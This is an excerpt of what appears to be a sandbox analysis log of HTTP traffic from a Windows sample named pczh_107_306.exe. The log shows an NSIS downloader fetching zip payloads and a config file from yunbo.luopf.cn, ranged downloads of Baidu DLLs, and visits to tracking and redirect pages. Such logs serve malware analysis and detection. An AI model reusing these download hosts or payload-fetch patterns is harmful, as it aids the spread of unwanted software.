x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=950272-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>
Date: Mon, 28 Jul 2014 23:18:00 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 950272-1178447/1178448<br>
Content-Length: 228176<br>
Age: 1652555<br>
Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>........"...................................@...........]5............<br>......,...............P[..........".......P.......<................<br>...@............8......................................"..............<br>..........................[.......[.......[.."........................<br>................[.."....... ............................... \.."......<br>.L........................................................h..`...(....<br>...........0...............H...P;......................<...P..."...<br>....................................P\......[\......f\......q\......y\<br>.......\.......\.......\.......\.......\.......\.......\..".......L...<br>........................"....................................... ]....<br>..(]......0]......8]......@]......H].."...............................<br>.........].......].......].......].......].......].......].......]....<br>...].......].......^....</pre></font><br><br
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=622592-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>
Date: Mon, 28 Jul 2014 23:18:00 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 622592-1178447/1178448<br>
Content-Length: 555856<br>
Age: 1652554<br>
Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 200 OK<br>
Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>
Date: Sat, 09 Aug 2014 06:25:46 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Content-Length: 924496<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Age: 676481<br>
Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=19791872-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:49 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 6212432<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127210<br>
Content-Range: bytes 19791872-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=20840448-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:08 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 5163856<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127229<br>
Content-Range: bytes 20840448-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=21889024-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:17 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 4115280<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127238<br>
Content-Range: bytes 21889024-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=327680-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>
Date: Sat, 09 Aug 2014 06:25:46 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 327680-924495/924496<br>
Content-Length: 596816<br>
Age: 676482<br>
Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /sw-search-shadu/client/dllv3/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=1114112-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:32 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 93408<br>
Connection: close<br>
ETag: 30cbc602ada7cdfb0346038c05996d84<br>
Last-Modified: Thu, 20 Jun 2013 06:27:51 GMT<br>
Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>
Age: 127254<br>
Content-Range: bytes 1114112-1207519/1207520<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: 21BEDF37C0B754EE14FE2C8B0543B5C0<br>
x-bs-request-id: MTAuNTguMzQuMTk6ODA4MDoxMzEyMjA1MTYxOjI4L0p1bC8yMDE0IDIyOjU5OjA1IA==<br>
x-bs-meta-crc32: 2965621797<br>
Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>
x-bs-client-ip: MTgwLjc2LjIyLjExNQ==<br><pre>................................@...........v...@...........j.........<br>..........................".......@...................................<br>........0................... ...@...........J.........................<br>.............."...................................".......(...........<br>......................................................................<br>..................................@...................................<br>................"...................................................".<br>...............................</pre></font><br><br
<font color="red">GET /app.txt HTTP/1.0<br>
Host: yunbo.luopf.cn<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Length: 1321<br>
Content-Type: text/plain<br>
Last-Modified: Fri, 25 Jul 2014 03:40:40 GMT<br>
Accept-Ranges: bytes<br>
ETag: "1e984b34baa7cf1:32d"<br>
Server: Microsoft-IIS/6.0<br>
Date: Sun, 17 Aug 2014 02:20:16 GMT<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=22937600-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:23 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 3066704<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127244<br>
Content-Range: bytes 22937600-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=20054016-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:54 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 5950288<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127215<br>
Content-Range: bytes 20054016-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-shadu/client/dllv3/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=327680-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:31 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 879840<br>
Connection: close<br>
ETag: 30cbc602ada7cdfb0346038c05996d84<br>
Last-Modified: Thu, 20 Jun 2013 06:27:51 GMT<br>
Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>
Age: 127253<br>
Content-Range: bytes 327680-1207519/1207520<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: 21BEDF37C0B754EE14FE2C8B0543B5C0<br>
x-bs-request-id: MTAuNTguMzQuMTk6ODA4MDoxMzEyMjA1MTYxOjI4L0p1bC8yMDE0IDIyOjU5OjA1IA==<br>
x-bs-meta-crc32: 2965621797<br>
Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>
<<< skipped >>>
<font color="red">GET /zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go= HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: tv.aiqingzhihui.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sun, 17 Aug 2014 02:21:21 GMT<br>
Content-Length: 1350<br>
Content-Type: text/html<br>
Last-Modified: Tue, 17 Jun 2014 13:01:31 GMT<br>
Connection: Keep-Alive<br>
ETag: "66d7a7422c8acf1:63d"<br>
Accept-Ranges: bytes<br>
Server: Microsoft-IIS/6.0<br>
X-Powered-By: ASP.NET<br>
<<< skipped >>>
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=950272-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>
Date: Mon, 28 Jul 2014 23:18:00 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 950272-1178447/1178448<br>
Content-Length: 228176<br>
Age: 1652555<br>
Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre></pre></font><br><br
<font color="red">GET /pczh_107_306.zip HTTP/1.0<br>
Host: yunbo.luopf.cn<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Length: 415552<br>
Content-Type: application/x-zip-compressed<br>
Last-Modified: Sun, 13 Jul 2014 03:35:27 GMT<br>
Accept-Ranges: bytes<br>
ETag: "f81e17d4b9ecf1:32d"<br>
Server: Microsoft-IIS/6.0<br>
Date: Sun, 17 Aug 2014 02:20:30 GMT<br>
<<< skipped >>>
<font color="red">GET /mini/fymini.htm?f=aiqingzhihui&code=null HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: mini.fengyunzhibo.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Moved Temporarily<br>
Date: Sun, 17 Aug 2014 02:21:19 GMT<br>
Content-Type: text/html;charset=ISO-8859-1<br>
Content-Length: 177<br>
Connection: keep-alive<br>
Location: hXXp://VVV.fengyunzhibo.com<br>
Content-Language: en-US<br>
Accept-Ranges: bytes<br>
Age: 0<br>
X-Cache: miss<br>
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs<br><pre><html>..<head><title>Document moved</title><<br>;/head>..<body><h1>Document moved</h1>..This docu<br>ment has moved <a href="hXXp://VVV.fengyunzhibo.com">here</a&<br>gt;.<p>..</body>..</html>..HTTP/1.1 302 Moved Tempor<br>arily..Date: Sun, 17 Aug 2014 02:21:19 GMT..Content-Type: text/html;ch<br>arset=ISO-8859-1..Content-Length: 177..Connection: keep-alive..Locatio<br>n: hXXp://VVV.fengyunzhibo.com..Content-Language: en-US..Accept-Ranges<br>: bytes..Age: 0..X-Cache: miss..Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs..<br><html>..<head><title>Document moved</title><<br>;/head>..<body><h1>Document moved</h1>..This docu<br>ment has moved <a href="hXXp://VVV.fengyunzhibo.com">here</a&<br>gt;.<p>..</body>..</html>....</pre></font><br><br
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=819200-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>
Date: Sun, 10 Aug 2014 15:52:24 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 819200-1178447/1178448<br>
Content-Length: 359248<br>
Age: 556090<br>
Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=950272-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>
Date: Sun, 10 Aug 2014 15:52:24 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 950272-1178447/1178448<br>
Content-Length: 228176<br>
Age: 556091<br>
Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre></pre></font><br><br
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:38 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 26004304<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127199<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=22151168-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:18 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 3853136<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127239<br>
Content-Range: bytes 22151168-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /guagua_77150006814.zip HTTP/1.0<br>
Host: yunbo.luopf.cn<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Length: 921448<br>
Content-Type: application/x-zip-compressed<br>
Last-Modified: Thu, 24 Jul 2014 04:31:48 GMT<br>
Accept-Ranges: bytes<br>
ETag: "76aed22ef8a6cf1:32d"<br>
Server: Microsoft-IIS/6.0<br>
Date: Sun, 17 Aug 2014 02:20:17 GMT<br>
<<< skipped >>>
<font color="red">GET /9.gif?abc=1&rnd=135011660 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
